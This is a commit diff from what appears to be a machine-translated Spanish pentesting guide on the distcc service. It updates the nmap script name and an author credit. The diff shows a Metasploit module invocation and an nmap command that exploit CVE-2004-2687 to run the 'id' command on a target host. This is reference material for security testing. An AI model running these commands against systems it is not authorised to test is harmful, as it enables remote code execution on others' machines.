Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

This commit is contained in:
Translator 2024-03-11 14:44:53 +00:00
parent 2e4256d451
commit 97ee1db72c

View file

@ -27,7 +27,7 @@ PORT STATE SERVICE
Verificar si es vulnerable a **CVE-2004-2687** para ejecutar código arbitrario:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
@ -38,7 +38,7 @@ _No creo que Shodan detecte este servicio._
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Publicado por **Álex B (@r1p)**
Post creado por **Álex B (@r1p)**
<details>